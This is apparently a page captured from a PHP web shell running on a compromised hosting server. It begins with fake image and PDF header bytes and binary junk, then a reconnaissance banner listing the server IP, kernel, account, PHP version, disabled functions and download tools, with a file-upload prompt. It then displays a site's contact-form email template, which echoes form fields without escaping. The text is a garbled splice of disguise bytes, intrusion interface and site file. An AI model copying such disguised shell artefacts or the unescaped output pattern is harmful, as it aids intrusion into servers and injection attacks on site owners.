ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 82.197.83.129 / Your IP : 216.73.216.166 [ Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : u489457460 ( 489457460) PHP Version : 7.3.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u489457460/domains/syoft.com/public_html/blogs/application/views/ |
Upload File : |
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>Syoft</title> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <style> table, th, td { border:1px solid black; } </style> </head> <body> <div> <p style="Margin-top: 0;color: #565656;font-family: Georgia,serif;font-size: 16px;line-height: 25px;Margin-bottom: 25px">Hey Dinesh,</p> <p style="Margin-top: 0;color: #565656;font-family: Georgia,serif;font-size: 16px;line-height: 25px;Margin-bottom: 25px"> Contact Form Submission Details are below: </p> <table style="width:100%"> <tr> <td>Subject</td> <td><?php echo $subject;?></td> </tr> <tr> <td>First Name</td> <td><?php echo $first_name;?></td> </tr> <tr> <td>Last Name</td> <td><?php echo $last_name;?></td> </tr> <tr> <td>Company Name</td> <td><?php echo $company_name;?></td> </tr> <tr> <td>Mobile</td> <td><?php echo $mobile;?></td> </tr> <tr> <td>Email</td> <td><?php echo $email;?></td> </tr> <tr> <td>Message</td> <td><?php echo $description;?></td> </tr> </table> </div> </body> </html>